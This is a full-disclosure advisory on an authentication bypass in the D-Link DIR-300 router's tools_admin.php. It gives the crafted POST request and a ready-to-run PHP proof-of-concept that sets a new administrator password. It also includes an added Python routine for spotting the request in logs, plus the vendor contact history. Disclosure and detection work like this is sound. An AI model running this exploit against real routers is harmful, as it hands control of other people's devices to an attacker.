D-Link DIR-300 authentication bypass
[intro]
Hello, I found a security bug in the D-Link DIR-300 wireless router. It can
be used to bypass the authentication mechanism by an attacker with access to
the web interface. I reported it to D-Link but they are not replying to
my emails. Judging by other D-Link security holes and their status, I
think that they won't reply, so I decided to write about it here.
[Technical details]
The control panel script tools_admin.php allows an attacker to change the
administrator name, password and other variables without any
authorization by sending a specially crafted HTTP POST request such as:
---cut here---
POST http://192.168.1.1:80/tools_admin.php HTTP/1.1
Host: 192.168.1.2
Keep-Alive: 115
Content-Type: application/x-www-form-urlencoded
Content-length: 0

ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh
---cut here---
If an attacker makes this request to the control panel, the
administrator username is set to "admin" with the password "uhOHahEh".
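As an added example (not part of the advisory), the following Python helper shows how a defender can spot the request shape described above in proxy or IDS logs: a POST to tools_admin.php carrying NO_NEED_AUTH=1 together with administrator-credential fields. The log format (`<client> <METHOD> <path> <body>`) and the sample lines are constructed for illustration.

```python
"""Added detection example for the DIR-300 tools_admin.php bypass pattern.
Not the vendor's or the advisory author's code; the log format and the
sample entries below are constructed for illustration."""
from urllib.parse import parse_qs

# Form fields that change administrator credentials; they should only be
# accepted inside an authenticated session.
ADMIN_CHANGE_PARAMS = {"admin_name", "admin_password1"}


def parse_post_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into {key: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def is_auth_bypass_attempt(method: str, path: str, body: str) -> bool:
    """True when a request matches the advisory's pattern: a POST to
    tools_admin.php with NO_NEED_AUTH=1 plus an admin credential field."""
    if method.upper() != "POST" or not path.lower().endswith("/tools_admin.php"):
        return False
    params = parse_post_body(body)
    bypass_flag = params.get("NO_NEED_AUTH") == "1"
    changes_admin = bool(ADMIN_CHANGE_PARAMS & set(params))
    return bypass_flag and changes_admin


def scan_log(lines):
    """Scan constructed log lines '<client> <METHOD> <path> [<body>]' and
    return the client addresses whose requests match the bypass pattern."""
    hits = []
    for line in lines:
        parts = line.split(" ", 3)
        if len(parts) < 3:
            continue  # malformed line, skip it
        client, method, path = parts[:3]
        body = parts[3] if len(parts) == 4 else ""
        if is_auth_bypass_attempt(method, path, body):
            hits.append(client)
    return hits


# Constructed sample log: a normal login, a bypass-shaped request, a plain GET.
SAMPLE_LOG = [
    "10.0.0.5 POST /tools_admin.php ACTION_POST=LOGIN&LOGIN_USER=admin"
    "&LOGIN_PASSWD=secret&login=+Log+In+",
    "10.0.0.9 POST /tools_admin.php ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b"
    "&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=x",
    "10.0.0.7 GET /tools_admin.php",
]

if __name__ == "__main__":
    for ip in scan_log(SAMPLE_LOG):
        print(f"ALERT: unauthenticated admin credential change attempt from {ip}")
```

The check deliberately requires both the NO_NEED_AUTH flag and a credential field, so ordinary logins to the same script do not trigger it; on a device that cannot be patched, the same rule can be applied at a filtering proxy in front of the web interface.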
[Affected]
- All known D-Link DIR-300 firmware versions (i.e. 2.01B1, 1.04, 1.05).
- There is a possibility that other D-Link devices which use the same PHP
scripts in the control panel are affected. I'm not able to check it
because I don't have the devices for tests. I'm counting on you ;->
[Code]
---cut here---
<?php
// Proof of concept from the advisory: sends the crafted form body to
// tools_admin.php and sets the administrator password given on the command line.
if(sizeof($argv)!=4) {
    echo "Usage: php5 $argv[0] <router ip address> <port> <admin password>\n";
    exit;
}
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_PORT, $argv[2]);
curl_setopt($ch, CURLOPT_POST, 1);
// Same form body as in the request above, with the chosen password URL-encoded.
curl_setopt($ch, CURLOPT_POSTFIELDS,
    "ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=".urlencode($argv[3]));
echo "+ starting request\n";
$out = curl_exec($ch);
if($out===false) {
    echo "- Error: could not connect (http://$argv[1]:$argv[2]/tools_admin.php).\n";
    exit;
} else
    echo "+ request sent\n";
curl_close($ch);
// The router's response page contains "Successfully" when the change was applied.
if(stripos($out,"Successfully")===false) {
    echo "- something went wrong (check answer - answer.html)!\n";
    $f=fopen("answer.html","w"); fwrite($f,$out); fclose($f);
    exit;
}
else
    echo "+ ok, now you can login using l: admin p:$argv[3]\n";
?>
---cut here---
[History]
- Information sent to vendor 07.08.2010
- No response
- Information resent to vendor 07.31.2010
- No response from vendor
[Credits]
Karol Celiński ( Celin )
Pentester/Researcher @ Safe Computing
[Contact]
karol at celin dot pl
[Greetz]
Tomasz Sawiak, Jacek Kowalski, Marcin Kozlowski, Robert Tomczykowski,
Wojtek Machaj, Marek Zmyslowski, Szymon Sobczyk and all Safe Computing
members.